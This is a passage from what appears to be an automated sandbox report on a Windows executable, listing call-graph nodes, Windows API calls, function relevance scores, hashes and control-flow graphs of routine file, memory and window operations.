7486->7498 7488 14001208c 7488->7437 7499 140011370 HeapAlloc HeapAlloc InitializeCriticalSection 7489->7499 7491 14000de38 7491->7439 7492->7441 7500 1400110dc 7493->7500 7497 14000c0a8 InitializeCriticalSection 7498->7488 7499->7491 7501 1400110fd 7500->7501 7502 140011112 TlsAlloc HeapAlloc TlsSetValue 7501->7502 7503 140011149 TlsGetValue HeapReAlloc TlsSetValue 7501->7503 7502->7503 7504 140011198 7503->7504 7505 14000c08d 7504->7505 7508 140011cb0 HeapAlloc 7504->7508 7507 140011370 HeapAlloc HeapAlloc InitializeCriticalSection 7505->7507 7507->7497 7509 140011cd3 7508->7509 7509->7505 7582 140007a00 7585 140007a50 7582->7585 7586 140007a79 7585->7586 7607 140012630 TlsGetValue 7586->7607 7589 140012630 TlsGetValue 7590 140007a9c 7589->7590 7609 1400126d0 TlsGetValue 7590->7609 7593 140007abf 7599 140007acf 7593->7599 7614 1400127f0 TlsGetValue 7593->7614 7596 140007c35 7615 1400128a0 TlsGetValue 7596->7615 7598 140007a1c 7599->7596 7599->7599 7600 140007b20 HeapAlloc 7599->7600 7601 140007b50 7599->7601 7600->7601 7601->7601 7602 140007b91 wcsncpy 7601->7602 7605 140007bac 7601->7605 7602->7605 7603 140007c02 7603->7596 7604 140007c09 HeapFree 7603->7604 7604->7596 7605->7603 7606 140007bdf wcsncpy 7605->7606 7606->7603 7608 140007a92 7607->7608 7608->7589 7610 1400126f4 7609->7610 7611 14001272d HeapReAlloc 7610->7611 7612 140007ab1 7610->7612 7611->7612 7612->7593 7613 1400127f0 TlsGetValue 7612->7613 7613->7593 7614->7599 7615->7598 7616 140008200 7619 140008260 7616->7619 7620 1400082e4 7619->7620 7621 140008397 7620->7621 7632 14000830a 7620->7632 7623 140012630 TlsGetValue 7621->7623 7622 140008221 7624 14000839f 7623->7624 7625 1400083ba 7624->7625 7626 1400083aa _wcsdup 7624->7626 7627 140012630 TlsGetValue 7625->7627 7626->7625 7628 1400083c2 7627->7628 7629 1400083d8 7628->7629 7630 1400083cd _wcsdup 7628->7630 7631 140012630 TlsGetValue 7629->7631 7630->7629 7633 1400083e0 7631->7633 7632->7622 7634 140008363 wcsncpy 7632->7634 7635 1400083eb _wcsdup 7633->7635 7636 1400083f8 7633->7636 7634->7632 7635->7636 7636->7636 7637 1400126d0 2 API calls 7636->7637 7638 140008481 7637->7638 7639 1400084ed wcsncpy 7638->7639 7640 140008488 7638->7640 7641 14000850e 7638->7641 7639->7641 7642 140008575 7640->7642 7643 14000856d free 7640->7643 7641->7640 7647 1400085c0 wcsncpy 7641->7647 7644 140008587 7642->7644 7645 14000857f free 7642->7645 7643->7642 7644->7622 7646 140008591 free 7644->7646 7645->7644 7646->7622 7647->7641 7946 14000d881 7947 14000d89d 7946->7947 7948 14000d8dc 7946->7948 7947->7948 7951 14000d8af 7947->7951 7953 14000d60c 7947->7953 7951->7948 7960 14000d6a0 7951->7960 7965 140016538 7951->7965 7954 14000d656 7953->7954 7955 14000d62f 7953->7955 7956 14000d654 7954->7956 7957 1400116f4 3 API calls 7954->7957 7955->7956 7958 1400168c0 HeapFree 7955->7958 7974 1400116f4 7955->7974 7956->7951 7957->7954 7958->7955 7961 14001147c 4 API calls 7960->7961 7962 14000d6b6 7961->7962 7963 14000d6c2 memset 7962->7963 7964 14000d6d6 7962->7964 7963->7964 7964->7951 7966 1400168b7 7965->7966 7971 140016541 7965->7971 7966->7951 7967 1400168b2 memmove 7967->7966 7968 140016860 memmove 7968->7971 7969 140016895 7969->7966 7969->7967 7970 140016538 wcslen HeapAlloc HeapFree 7970->7971 7971->7968 7971->7969 7971->7970 7972 140012360 HeapFree 7971->7972 7981 1400122f0 7971->7981 7972->7971 7975 14001170a EnterCriticalSection 7974->7975 7976 140011714 7974->7976 7975->7976 7979 14001177b HeapFree 7976->7979 7980 140011794 7976->7980 7977 1400117f1 7977->7955 7978 1400117e7 LeaveCriticalSection 7978->7977 7979->7980 7980->7977 7980->7978 7982 140012351 7981->7982 7983 140012306 wcslen HeapAlloc 7981->7983 7982->7971 7985 140012820 7983->7985 7986 140012845 7985->7986 7986->7982 8224 140013507 8225 14001350c 8224->8225 8226 140014d80 3 API calls 8225->8226 8227 1400134ee 8225->8227 8226->8227 7648 140011e0c 7650 140011e56 7648->7650 7651 140011ec4 7650->7651 7652 140011d30 7650->7652 7658 140011ef4 7652->7658 7655 140011d6e HeapAlloc 7656 140011d90 memset 7655->7656 7657 140011dc6 7655->7657 7656->7657 7657->7651 7659 140011d69 7658->7659 7662 140011ef9 7658->7662 7659->7655 7659->7657 7660 140011f38 HeapFree 7660->7659 7662->7660 7663 1400168c0 7662->7663 7665 1400168da 7663->7665 7664 1400169fd 7664->7662 7665->7664 7666 1400168c0 HeapFree 7665->7666 7667 140012360 HeapFree 7665->7667 7666->7665 7667->7665 7668 14000bc0c 7669 14000bc19 EnableWindow 7668->7669 7670 14000bc2b 7668->7670 7669->7670 7671 140014810 7672 14001482a 7671->7672 7673 140014869 7671->7673 7672->7673 7674 14001483f memmove memmove 7672->7674 7674->7673 7675 140016410 malloc 8356 140012390 HeapFree HeapFree 7987 14000c490 7992 14000c6e0 7987->7992 7990 14000c4c6 7991 14000c4ab GetCurrentProcess TerminateProcess 7991->7990 7995 14000c4f0 7992->7995 7996 14000c510 7995->7996 7996->7996 7997 14000c562 RtlLookupFunctionEntry 7996->7997 7998 14000c5b4 RtlLookupFunctionEntry 7997->7998 8000 14000c5f3 7997->8000 7998->8000 8001 14000c499 7998->8001 7999 14000c61b RtlVirtualUnwind 7999->8000 7999->8001 8000->7999 8000->8001 8002 14000c664 RtlLookupFunctionEntry 8000->8002 8001->7990 8001->7991 8002->8000 8002->8001 8228 140002914 8229 140012360 HeapFree 8228->8229 8230 140002926 8229->8230 8003 140012e97 8004 140012ead 8003->8004 8006 140012ea0 8003->8006 8005 140014d80 3 API calls 8004->8005 8004->8006 8005->8006 7676 14000281c 7683 140012600 TlsGetValue 7676->7683 7678 140002821 7679 140012360 HeapFree 7678->7679 7680 140002835 7679->7680 7681 140012360 HeapFree 7680->7681 7682 140002847 7681->7682 7683->7678 7684 140016420 free 8231 140017120 8232 1400171ae malloc 8231->8232 8233 140017140 MultiByteToWideChar 8231->8233 8234 1400171bc 8232->8234 8233->8232 8236 14001716d malloc MultiByteToWideChar 8233->8236 8236->8234 8007 14000bea0 GetWindowThreadProcessId GetCurrentThreadId 8008 14000bf31 8007->8008 8009 14000bec1 IsWindowVisible 8007->8009 8009->8008 8010 14000bece 8009->8010 8011 140011cb0 HeapAlloc 8010->8011 8012 14000bedf GetCurrentThreadId GetWindowLongPtrW 8011->8012 8013 14000bf06 8012->8013 8014 14000bf0a GetForegroundWindow 8012->8014 8013->8014 8014->8008 8015 14000bf15 IsWindowEnabled 8014->8015 8015->8008 8016 14000bf22 EnableWindow 8015->8016 8016->8008 7685 140013021 7687 140013026 7685->7687 7686 140014d80 3 API calls 7689 140012f79 7686->7689 7688 1400132aa memmove 7687->7688 7687->7689 7690 1400132ba 7687->7690 7688->7690 7690->7686 7690->7689 8017 1400034a2 8030 140012600 TlsGetValue 8017->8030 8019 1400034a7 8020 140012360 HeapFree 8019->8020 8021 1400034bb 8020->8021 8022 140012360 HeapFree 8021->8022 8023 1400034cd 8022->8023 8024 140012360 HeapFree 8023->8024 8025 1400034df 8024->8025 8026 140012360 HeapFree 8025->8026 8027 1400034f1 8026->8027 8028 140012360 HeapFree 8027->8028 8029 140003503 8028->8029 8030->8019 7691 140011024 7692 140011032 TlsFree 7691->7692 7693 14001103e 7691->7693 7692->7693 7694 14000e824 7695 14000e8e4 7694->7695 7703 14000fee4 7695->7703 7704 14000ff0b 7703->7704 7705 14000ff92 7704->7705 7706 14000ff47 memmove 7704->7706 7710 14000ea48 7706->7710 7708 14000ea48 memmove 7709 14000ff70 7708->7709 7709->7705 7709->7708 7711 14000ea81 7710->7711 7712 14000ea71 memmove 7710->7712 7711->7709 7712->7711 8375 140010fa8 8376 140010fbe 8375->8376 8377 140010fdd HeapFree 8376->8377 8378 140010fef 8376->8378 8377->8378 8379 1400021a8 8380 1400021ab 8379->8380 8381 140012360 HeapFree 8380->8381 8382 1400021ba 8381->8382 8383 140012360 HeapFree 8382->8383 8384 1400021cc 8383->8384 8385 140012360 HeapFree 8384->8385 8386 1400021de 8385->8386 7713 14001162c 7718 14001147c 7713->7718 7716 140011646 memset 7717 140011659 7716->7717 7719 1400114a4 7718->7719 7720 14001149a EnterCriticalSection 7718->7720 7721 14001155e HeapAlloc 7719->7721 7725 1400114b1 7719->7725 7720->7719 7722 140011586 HeapAlloc 7721->7722 7721->7725 7722->7725 7723 140011606 7723->7716 7723->7717 7724 1400115fc LeaveCriticalSection 7724->7723 7725->7723 7725->7724 7726 14000b62c 7727 14000b635 HeapFree 7726->7727 7728 14000b647 7726->7728 7727->7728 8040 1400040ac 8041 1400123e0 21 API calls 8040->8041 8042 1400040ce 8041->8042 8043 14000d6a0 5 API calls 8042->8043 8044 1400040da 8043->8044 8053 1400121c0 GetLastError TlsGetValue SetLastError 8044->8053 8046 1400040e4 8054 1400121c0 GetLastError TlsGetValue SetLastError 8046->8054 8048 1400040f8 8055 14000ca00 8048->8055 8052 140004122 8053->8046 8054->8048 8056 14000ca20 8055->8056 8057 1400126d0 2 API calls 8056->8057 8058 14000ca34 8057->8058 8059 14000ca3b memmove 8058->8059 8060 14000410d 8058->8060 8059->8060 8061 140012210 TlsGetValue 8060->8061 8062 140012251 HeapAlloc 8061->8062 8063 140012276 HeapReAlloc 8061->8063 8064 1400122a1 8062->8064 8063->8064 8064->8052 8237 14000432e 8240 140012600 TlsGetValue 8237->8240 8239 140004333 8240->8239 7729 140011a30 InitializeCriticalSection 8065 1400136b0 8066 1400136bf 8065->8066 8067 140013750 memmove 8066->8067 8068 140014393 8066->8068 8070 14001378b 8066->8070 8067->8070 8069 140014d80 3 API calls 8068->8069 8068->8070 8069->8070 8241 140016f30 8242 140016f60 8241->8242 8242->8242 8243 140016f6b MultiByteToWideChar 8242->8243 8244 1400126d0 2 API calls 8243->8244 8245 140016f97 MultiByteToWideChar 8244->8245 7538 14000c6b0 7539 14000c6d1 7538->7539 7540 14000c6c0 RemoveVectoredExceptionHandler 7538->7540 7540->7539 7730 140007a30 7731 140007a50 9 API calls 7730->7731 7732 140007a49 7731->7732 7733 140008230 7734 140008260 12 API calls 7733->7734 7735 140008251 7734->7735 8071 140008eb5 8072 140008ee3 8071->8072 8073 140008ec9 8071->8073 8076 140008ed4 8072->8076 8087 14000afc0 8072->8087 8073->8076 8077 140009da0 8073->8077 8078 140009dc9 8077->8078 8080 140009e0d 8077->8080 8097 14000b510 8078->8097 8080->8080 8081 140009da0 _wcsicmp 8080->8081 8084 140009de0 8080->8084 8082 140009e66 8081->8082 8083 140009da0 _wcsicmp 8082->8083 8086 140009e79 8083->8086 8084->8076 8085 14000b510 _wcsicmp 8085->8086 8086->8084 8086->8085 8088 14000afe9 8087->8088 8090 14000b02d 8087->8090 8089 14000b510 _wcsicmp 8088->8089 8094 14000b000 8089->8094 8090->8090 8091 14000afc0 _wcsicmp 8090->8091 8090->8094 8092 14000b086 8091->8092 8093 14000afc0 _wcsicmp 8092->8093 8096 14000b099 8093->8096 8094->8076 8095 14000b510 _wcsicmp 8095->8096 8096->8094 8096->8095 8098 14000b524 8097->8098 8099 14000b515 8097->8099 8098->8084 8100 1400070cc _wcsicmp 8099->8100 8101 14000b51e 8099->8101 8100->8084 8100->8097 8101->8084 8246 140014535 8247 14001455a 8246->8247 8247->8247 8248 140014779 memmove 8247->8248 8249 1400145dc 8247->8249 8248->8249 7736 14000bc38 7737 14000bc84 7736->7737 7738 14000bc4c 7736->7738 7738->7737 7739 14000bc51 SendMessageW Sleep PostMessageW 7738->7739 7739->7737 7744 14000e83b HeapAlloc 7745 14000e87d 7744->7745 7746 14000303f 7757 140012600 TlsGetValue 7746->7757 7748 140003044 7749 140012360 HeapFree 7748->7749 7750 140003058 7749->7750 7751 140012360 HeapFree 7750->7751 7752 14000306a 7751->7752 7753 140012360 HeapFree 7752->7753 7754 14000307c 7753->7754 7755 140012360 HeapFree 7754->7755 7756 14000308e 7755->7756 7757->7748 7758 14000c040 7763 140011248 EnterCriticalSection 7758->7763 7761 14000c075 7762 14000c05d CloseHandle 7762->7761 7764 14001127a LeaveCriticalSection 7763->7764 7765 14001126c 7763->7765 7766 14000c058 7764->7766 7765->7764 7766->7761 7766->7762 8102 1400048c0 8111 140012600 TlsGetValue 8102->8111 8104 1400048c5 8105 140012360 HeapFree 8104->8105 8106 1400048d9 8105->8106 8107 140012360 HeapFree 8106->8107 8108 1400048eb 8107->8108 8109 140012360 HeapFree 8108->8109 8110 1400048fd 8109->8110 8111->8104 8250 14000e540 8251 140011248 2 API calls 8250->8251 8252 14000e55f 8251->8252 8253 14000b740 8256 14000b758 8253->8256 8296 14000b5d8 8256->8296 8258 14000b790 8259 14000b5d8 2 API calls 8258->8259 8260 14000b79b 8259->8260 8261 14000b5d8 2 API calls 8260->8261 8262 14000b7a6 8261->8262 8263 14000b7b2 GetStockObject 8262->8263 8264 14000b7c3 LoadIconW LoadCursorW RegisterClassExW 8262->8264 8263->8264 8265 14000be5c 3 API calls 8264->8265 8266 14000b83f 8265->8266 8267 14000bf44 7 API calls 8266->8267 8268 14000b84d 8267->8268 8269 14000b859 IsWindowEnabled 8268->8269 8270 14000b87a 8268->8270 8269->8270 8271 14000b863 EnableWindow 8269->8271 8272 14000be5c 3 API calls 8270->8272 8271->8270 8273 14000b886 GetSystemMetrics GetSystemMetrics CreateWindowExW 8272->8273 8274 14000b902 6 API calls 8273->8274 8275 14000bb96 8273->8275 8276 14000ba12 SendMessageW wcslen wcslen SendMessageW 8274->8276 8277 14000ba53 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 8274->8277 8278 14000bba4 8275->8278 8299 1400127b0 TlsGetValue 8275->8299 8276->8277 8281 14000bb48 8277->8281 8279 14000bba9 HeapFree 8278->8279 8280 14000bbbb 8278->8280 8279->8280 8283 14000bbd2 8280->8283 8284 14000bbc0 HeapFree 8280->8284 8285 14000bb51 8281->8285 8286 14000bb0a GetMessageW 8281->8286 8288 14000bbd7 HeapFree 8283->8288 8289 14000b751 8283->8289 8284->8283 8290 14000bb56 DestroyAcceleratorTable 8285->8290 8291 14000bb5f 8285->8291 8286->8285 8287 14000bb20 TranslateAcceleratorW 8286->8287 8287->8281 8292 14000bb34 TranslateMessage DispatchMessageW 8287->8292 8288->8289 8290->8291 8291->8275 8293 14000bb68 wcslen 8291->8293 8292->8281 8294 1400126d0 2 API calls 8293->8294 8295 14000bb77 wcscpy HeapFree 8294->8295 8295->8275 8297 14000b5ea wcslen HeapAlloc 8296->8297 8298 14000b60e 8296->8298 8297->8298 8298->8258 8299->8278 7767 14000c444 7768 14000c455 7767->7768 7769 14000c44d SetEnvironmentVariableW 7767->7769 7769->7768 8112 14000cec4 8113 14000cf4b 8112->8113 8114 14000cee9 8112->8114 8114->8113 8116 14000cf02 8114->8116 8120 14000d140 8114->8120 8116->8113 8119 140016538 5 API calls 8116->8119 8127 14000d1f0 8116->8127 8136 14000d02c 8116->8136 8119->8116 8121 14000d15b 8120->8121 8122 14000d1b4 memset 8121->8122 8123 14000d163 HeapFree 8121->8123 8125 1400168c0 HeapFree 8121->8125 8126 1400116f4 3 API calls 8121->8126 8124 14000d1d0 8122->8124 8123->8121 8124->8116 8125->8121 8126->8121 8128 14000d230 8127->8128 8130 14000d210 8127->8130 8129 14001147c 4 API calls 8128->8129 8135 14000d22e 8129->8135 8130->8128 8131 14000d21d 8130->8131 8133 1400168c0 HeapFree 8131->8133 8131->8135 8132 14000d295 8132->8116 8133->8135 8134 14000d281 memset 8134->8132 8135->8132 8135->8134 8137 14000d073 8136->8137 8138 14000d04c 8136->8138 8142 14000d08f 8137->8142 8157 14000d3a4 8137->8157 8151 14000cf74 8138->8151 8141 14000d051 8141->8137 8143 14000d059 8141->8143 8144 14001147c 4 API calls 8142->8144 8145 14000d06e 8143->8145 8149 1400168c0 HeapFree 8143->8149 8146 14000d0a6 8144->8146 8147 14000d11c 8145->8147 8148 14000d108 memset 8145->8148 8146->8147 8150 14000d0ae wcslen HeapAlloc wcscpy 8146->8150 8147->8116 8148->8147 8149->8145 8150->8145 8152 14000cfa2 8151->8152 8154 14000cfe2 8151->8154 8153 14000d3a4 tolower 8152->8153 8155 14000cfa7 8153->8155 8154->8155 8156 14000cff8 wcscmp 8154->8156 8155->8141 8156->8154 8156->8155 8158 14000d3c7 tolower 8157->8158 8159 14000d3b8 8158->8159 8160 14000d3d0 8158->8160 8159->8158 8160->8142 8300 140003144 8301 140003147 8300->8301 8302 140012360 HeapFree 8301->8302 8303 140003156 8302->8303 8304 140012360 HeapFree 8303->8304 8305 140003168 8304->8305 7770 140002648 7771 14000264f 7770->7771 7772 140012360 HeapFree 7771->7772 7773 140002666 7772->7773 7774 140012360 HeapFree 7773->7774 7775 140002678 7774->7775 7776 140012360 HeapFree 7775->7776 7777 14000268a 7776->7777 7778 140012360 HeapFree 7777->7778 7779 14000269c 7778->7779 7780 140012360 HeapFree 7779->7780 7781 1400026ae 7780->7781 8161 1400088c9 8162 1400088e0 8161->8162 8163 1400088fa 8161->8163 8164 140009da0 _wcsicmp 8162->8164 8166 1400088eb 8162->8166 8165 14000afc0 _wcsicmp 8163->8165 8163->8166 8164->8166 8165->8166 7782 14000b64c 7783 14000b667 7782->7783 7784 14000b70e UnregisterClassW 7782->7784 7785 14000b68b 7783->7785 7787 14000b674 DefWindowProcW 7783->7787 7788 14000b67f 7783->7788 7786 14000b72c 7784->7786 7785->7786 7789 14000b6ea EnableWindow 7785->7789 7790 14000b6fc 7785->7790 7787->7786 7788->7785 7791 14000b695 GetWindowLongPtrW GetWindowTextLengthW HeapAlloc GetWindowTextW 7788->7791 7789->7790 7794 14000bf44 7790->7794 7791->7785 7795 14000bf57 EnumWindows 7794->7795 7796 14000bfbb 7794->7796 7798 14000b703 DestroyWindow 7795->7798 7799 14000bf77 GetCurrentThreadId 7795->7799 7797 14000bfc7 GetCurrentThreadId 7796->7797 7796->7798 7801 14000bfdb EnableWindow 7796->7801 7803 14000bff0 SetWindowPos 7796->7803 7805 140011c68 7796->7805 7797->7796 7798->7786 7800 14000bf85 7799->7800 7800->7798 7800->7799 7802 14000bf8b SetWindowPos 7800->7802 7801->7796 7802->7800 7803->7796 7806 140011c74 HeapFree 7805->7806 7808 14001f820 7806->7808 8167 1400130cb 8169 1400130d0 8167->8169 8168 140014d80 3 API calls 8172 140013480 8168->8172 8170 1400132ba 8169->8170 8171 1400132aa memmove 8169->8171 8170->8168 8170->8172 8171->8170 8306 140002b4c 8307 1400123e0 21 API calls 8306->8307 8308 140002b6a 8307->8308 8391 140016fd0 8392 140017000 8391->8392 8392->8392 8393 14001700b MultiByteToWideChar malloc MultiByteToWideChar 8392->8393 7510 14000de50 7528 1400112a8 EnterCriticalSection 7510->7528 7512 14000de98 7513 14000deb6 7512->7513 7514 14000defb 7512->7514 7522 14000e04d 7512->7522 7515 14000dec9 7513->7515 7516 14000decd CreateFileW 7513->7516 7517 14000df42 7514->7517 7518 14000df00 7514->7518 7515->7516 7524 14000dfb7 7516->7524 7521 14000df5f CreateFileW 7517->7521 7517->7524 7519 14000df13 7518->7519 7520 14000df17 CreateFileW 7518->7520 7519->7520 7520->7524 7523 14000df8d CreateFileW 7521->7523 7521->7524 7523->7524 7524->7522 7525 14000dfe1 HeapAlloc 7524->7525 7526 14000dff9 7524->7526 7525->7526 7526->7522 7527 14000e036 SetFilePointer 7526->7527 7527->7522 7529 1400112e3 7528->7529 7530 1400112d0 7528->7530 7531 140011312 7529->7531 7532 1400112e9 HeapReAlloc 7529->7532 7533 140011cb0 HeapAlloc 7530->7533 7535 14001132d HeapAlloc 7531->7535 7537 14001131d 7531->7537 7532->7531 7534 1400112de 7533->7534 7536 140011352 LeaveCriticalSection 7534->7536 7535->7537 7536->7512 7537->7536 8173 1400086d0 8174 140008701 8173->8174 8175 1400086ee 8173->8175 8176 140008710 CharLowerW CharLowerW 8174->8176 8177 14000873e 8174->8177 8176->8174 8176->8177 7809 140002853 7830 1400123e0 7809->7830 7813 14000286b 7843 1400121c0 GetLastError TlsGetValue SetLastError 7813->7843 7815 140002889 7844 140012450 7815->7844 7817 140002898 7849 1400121c0 GetLastError TlsGetValue SetLastError 7817->7849 7819 1400028a6 7850 1400121c0 GetLastError TlsGetValue SetLastError 7819->7850 7821 1400028ba 7851 14000c8e0 7821->7851 7825 1400028d4 7856 1400125d0 TlsGetValue 7825->7856 7827 1400028e5 7857 14000b574 7827->7857 7829 1400028fb 7831 1400123ed 7830->7831 7832 14001240f TlsGetValue 7830->7832 7835 140012060 5 API calls 7831->7835 7833 140002861 7832->7833 7834 140012420 7832->7834 7842 1400121c0 GetLastError TlsGetValue SetLastError 7833->7842 7873 140012bf0 HeapAlloc HeapAlloc TlsSetValue 7834->7873 7836 1400123f2 TlsGetValue 7835->7836 7864 140016cc4 7836->7864 7839 140012425 TlsGetValue 7841 140016cc4 13 API calls 7839->7841 7841->7833 7842->7813 7843->7815 7845 140012477 7844->7845 7846 140012469 wcslen 7844->7846 7847 1400126d0 2 API calls 7845->7847 7846->7845 7848 140012485 7847->7848 7848->7817 7849->7819 7850->7821 7852 14000c8f0 7851->7852 7853 1400126d0 2 API calls 7852->7853 7854 1400028ca 7853->7854 7855 140012520 TlsGetValue 7854->7855 7855->7825 7856->7827 7874 14000be5c GetForegroundWindow 7857->7874 7860 14000bf44 7 API calls 7861 14000b5a3 MessageBoxW 7860->7861 7862 14000bf44 7 API calls 7861->7862 7863 14000b5bf 7862->7863 7863->7829 7865 140016cf2 TlsAlloc InitializeCriticalSection 7864->7865 7866 140016d11 TlsGetValue 7864->7866 7865->7866 7867 140016de6 HeapAlloc 7866->7867 7868 140016d29 HeapAlloc 7866->7868 7869 14001240d 7867->7869 7868->7869 7870 140016d49 EnterCriticalSection 7868->7870 7869->7833 7871 140016d61 7 API calls 7870->7871 7872 140016d5e 7870->7872 7871->7867 7872->7871 7873->7839 7875 14000b596 7874->7875 7876 14000be76 GetWindowThreadProcessId GetCurrentProcessId 7874->7876 7875->7860 7876->7875 8394 1400031d9 8395 1400031dc 8394->8395 8396 140012360 HeapFree 8395->8396 8397 1400031eb 8396->8397 8398 14000c3dc GetEnvironmentVariableW 8399 14000c408 8398->8399 8400 1400126d0 2 API calls 8399->8400 8401 14000c413 GetEnvironmentVariableW 8400->8401 8178 1400076e0 8179 14000773d 8178->8179 8181 1400076f1 8178->8181 8180 140007729 wcsstr 8180->8179 8181->8179 8181->8180 8315 140007760 8316 1400077e7 8315->8316 8317 140007769 8315->8317 8317->8316 8318 1400077b9 8317->8318 8319 1400077c0 wcsstr 8317->8319 8322 1400085f0 8318->8322 8321 1400077be 8319->8321 8323 14000869f 8322->8323 8324 140008617 CharLowerW 8322->8324 8323->8321 8325 140008630 8324->8325 8325->8323 8325->8325 8326 14000864c CharLowerW 8325->8326 8327 140008670 CharLowerW CharLowerW 8325->8327 8326->8325 8327->8325

                                                              Executed Functions

                                                              Function 000000014000D9C4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 46libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
                                                              • String ID: GetLongPathNameW$Kernel32.DLL
                                                              • API String ID: 820969696-2943376620
                                                              • Opcode ID: 7b5facb765f8cdd7be91ebb16a2403b7b75564631065215e584da20e470a0f22
                                                              • Instruction ID: 08c74a34c6d82e646fe97c561cc400b119dc1938ee8d5d8dcc972cb306c03a44
                                                              • Opcode Fuzzy Hash: 7b5facb765f8cdd7be91ebb16a2403b7b75564631065215e584da20e470a0f22
                                                              • Instruction Fuzzy Hash: 17116D31721B4086EF159F27A9843A967A1FB8CFC0F481029EF4E4B7A5DE39C8528340
                                                              Function 0000000140001E57 Relevance: 9.3, APIs: 6, Instructions: 259COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: File$NameTemp$Heap$AllocErrorLastPathValue$AttributesBackslashCreateDeleteDirectoryExtensionFreeRenamememmovewcslenwcsncpy
                                                              • String ID:
                                                              • API String ID: 4232179356-0
                                                              • Opcode ID: f37d14f45d1a2abd6f91fd25c4a0b9dbf2c58692b7ebd1d65ebe457cd595aad6
                                                              • Instruction ID: 2ef6d83f5e2b3c8fb19d65fceeff62dc40447b47a2c1a218917e14d6a90cbc88
                                                              • Opcode Fuzzy Hash: f37d14f45d1a2abd6f91fd25c4a0b9dbf2c58692b7ebd1d65ebe457cd595aad6
                                                              • Instruction Fuzzy Hash: E38162FBE69644E5EA07B763BC86BED5220D3AD3D4F504410FF08062A3EE3995E64B10
                                                              Function 000000014000DE50 Relevance: 9.2, APIs: 6, Instructions: 151filememoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 94 14000de50-14000de9e call 1400112a8 97 14000dea4-14000deb4 94->97 98 14000e098-14000e09b 94->98 100 14000deb6-14000dec7 97->100 101 14000defb-14000defe 97->101 99 14000e07f-14000e097 98->99 102 14000dec9 100->102 103 14000decd-14000def6 CreateFileW 100->103 104 14000df42-14000df46 101->104 105 14000df00-14000df11 101->105 102->103 106 14000dfbc-14000dfc0 103->106 109 14000dfb7 104->109 110 14000df48-14000df59 104->110 107 14000df13 105->107 108 14000df17-14000df40 CreateFileW 105->108 113 14000dfc6-14000dfc9 106->113 114 14000e05d-14000e06f call 1400111dc 106->114 107->108 108->106 109->106 111 14000df5b 110->111 112 14000df5f-14000df8b CreateFileW 110->112 111->112 112->113 115 14000df8d-14000dfb5 CreateFileW 112->115 113->114 116 14000dfcf-14000dfd8 113->116 118 14000e074-14000e07c 114->118 115->106 119 14000dff9 116->119 120 14000dfda-14000dfdf 116->120 118->99 122 14000dffd-14000e02d 119->122 120->119 121 14000dfe1-14000dff7 HeapAlloc 120->121 121->122 123 14000e04d-14000e05b 122->123 124 14000e02f-14000e034 122->124 123->114 123->118 124->123 125 14000e036-14000e047 SetFilePointer 124->125 125->123
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: File$Create$CriticalSection$AllocEnterHeapLeavePointer
                                                              • String ID:
                                                              • API String ID: 2685021396-0
                                                              • Opcode ID: bf349e5ae30ca8a1459a9c900c950eddfabbaec973a548aea2fdccc3e75a92be
                                                              • Instruction ID: 9fd7d13fb8664e67d48ce56ae15862c74b29b4b7423edb5d501112f331116329
                                                              • Opcode Fuzzy Hash: bf349e5ae30ca8a1459a9c900c950eddfabbaec973a548aea2fdccc3e75a92be
                                                              • Instruction Fuzzy Hash: 2B51D4B261469086E761CF17F9007AA7690B39CBE4F04873AFF6A47BE4DB79C4419B10
                                                              Function 000000014000593C Relevance: 7.0, APIs: 4, Instructions: 980COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
